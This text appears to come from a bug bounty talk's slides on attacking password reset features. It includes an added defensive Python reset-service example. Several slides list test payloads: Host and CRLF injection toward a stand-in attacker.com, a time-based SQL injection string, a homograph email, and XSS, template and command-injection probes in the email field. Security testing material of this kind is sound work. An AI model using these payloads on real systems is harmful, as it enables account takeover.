Slide 1

Abusing Password Reset Functionality By Tuhin Bose

Slide 2

root@kali:~# whoami
Bug Bounty Hunter
CISO at Damn Secure Pentesting Hub
Crowdsource Security Researcher at Detectify
B. Tech in Cyber Security and Digital Forensics
Ethically hacked and secured Google, National Cyber Security Center (Netherlands), NCIIPC, ISC2 (Top 25), Unilever (Top 25), Mastercard, Dell, Pinterest, SpaceX (Top 3) and many other programs

Slide 3

AGENDA
What is Password Reset?
Common Password Reset Implementation in Web Application
Flows of Password Reset
Hacking Password Reset Feature
Conclusion & QNA

Slide 4

What is Password Reset?

Slide 5

If an application has a login feature, then it should also have a password reset feature. To implement a proper user management system, developers must implement password reset. It allows users to reset their account password.

Slide 6

Common Password Reset Implementation in Web Applications

Slide 7

Common Password Reset Implementation in Web Applications

Slide 8

Flows of Password Reset

Slide 9

Flow of Password Reset
1. User enters his username/email.
2. Server sends a password reset link to the user.
3. User opens the password reset link and enters the new password.
4. Password changed.

Slide 10

Hacking Password Reset Feature

Slide 11

1. Password Reset Poisoning

Slide 12

1. Password Reset Poisoning

Slide 13

1. Password Reset Poisoning

Slide 15

2. HTTP Parameter Pollution (HPP)

Slide 16

2. HTTP Parameter Pollution (HPP)

Slide 17

3. Insecure Direct Object Reference

Slide 18

4. Weak Encryption
Sometimes developers use weak encryption algorithms when generating password reset tokens. For example, sometimes they just encrypt the user's id + timestamp using a weak encryption algorithm.

Slide 19

5. Password reset token leakage via the Referer header

Slide 20

6. Token leakage in response/JS files
https://www.company.com/#/changePassword/username/token

Slide 21

7. Session/Token is not expiring after password reset.
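As an added example from the defensive side (not part of the slides), here is a hypothetical Python reset service that addresses points 1, 4 and 7 above: the link is built from a configured origin rather than the request Host header, the token is 32 CSPRNG bytes stored only as a hash instead of encrypt(user id + timestamp), and it is single-use, expires after 15 minutes, and every live session of the user is dropped when the password is reset. The class, the origin and the TTL are assumptions.

```python
import hashlib
import secrets
import time
from dataclasses import dataclass

# Hypothetical config: the origin used in reset links is fixed here and never
# taken from the request Host header, which defeats reset-link poisoning (1).
PUBLIC_ORIGIN = "https://www.company.com"   # constructed value
TOKEN_TTL_SECONDS = 15 * 60                 # assumed lifetime


@dataclass
class ResetRecord:
    user_id: int
    expires_at: float
    used: bool = False


class PasswordResetService:
    """Hypothetical service: CSPRNG tokens, hashed at rest, single-use, expiring."""

    def __init__(self, now=time.time):
        self.now = now                              # injectable clock for tests
        self.records: dict[str, ResetRecord] = {}   # sha256(token) -> record
        self.sessions: dict[int, set[str]] = {}     # user_id -> live session ids

    @staticmethod
    def _hash(token: str) -> str:
        # Only the hash is stored, so a database read does not yield usable tokens
        return hashlib.sha256(token.encode()).hexdigest()

    def create_reset_link(self, user_id: int) -> str:
        # 32 bytes from the OS CSPRNG: unguessable, unlike encrypt(user_id + timestamp) (4)
        token = secrets.token_urlsafe(32)
        self.records[self._hash(token)] = ResetRecord(
            user_id, self.now() + TOKEN_TTL_SECONDS)
        return f"{PUBLIC_ORIGIN}/reset?token={token}"

    def redeem(self, token: str, new_password: str) -> bool:
        rec = self.records.get(self._hash(token))
        if rec is None or rec.used or self.now() > rec.expires_at:
            return False                            # unknown, replayed, or expired
        rec.used = True                             # single use
        # ... store the new password hash for rec.user_id here ...
        self.sessions.pop(rec.user_id, None)        # revoke every live session (7)
        return True
```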

Slide 22

8. Param Miner: discover hidden parameters (or append previously known parameters) in the request, then try IDOR.

Slide 23

9. Try:
POST https://attacker.com/resetpassword.php HTTP/1.1
POST @attacker.com/resetpassword.php HTTP/1.1
POST :@attacker.com/resetpassword.php HTTP/1.1
POST /[email protected] HTTP/1.1

Slide 24

10. SQLi
[email protected]'+(select*from(select(sleep(2)))a)+'

Slide 25

11. Append a .json after the endpoint.

Slide 26

12. CRLF: /resetpassword?%0d%0aHost:%20attacker.com

Slide 27

13. Application Level DoS

Slide 28

14. If they are sending an OTP for password reset, try 2FA bypass techniques.
https://twitter.com/tuhin1729_/status/1414813055054086152

Slide 29

15. Try homograph on password reset.
[email protected]
email=victim@gmаil.com
[email protected]
Using Unicode: Cyrillic Small Letter A

Slide 30

16. Change the request method and Content-Type and observe how the application responds.

Slide 31

17. Append null bytes after your email and observe the response.

Slide 32

18. Try XSS, SSTI, Command Injection etc. in the email field.
hello+(alert(1))@gmail.com
"<%= 7 * 7 %>"@gmail.com
hello+(${{7*7}})@gmail.com
hello@`whoami`.xyz.burpcollaborator.net

Slide 33

19. Missing Rate Limit

Slide 34

More: https://twitter.com/tuhin1729_/status/1437471718142976007

Slide 35

@tuhin1729 [email protected]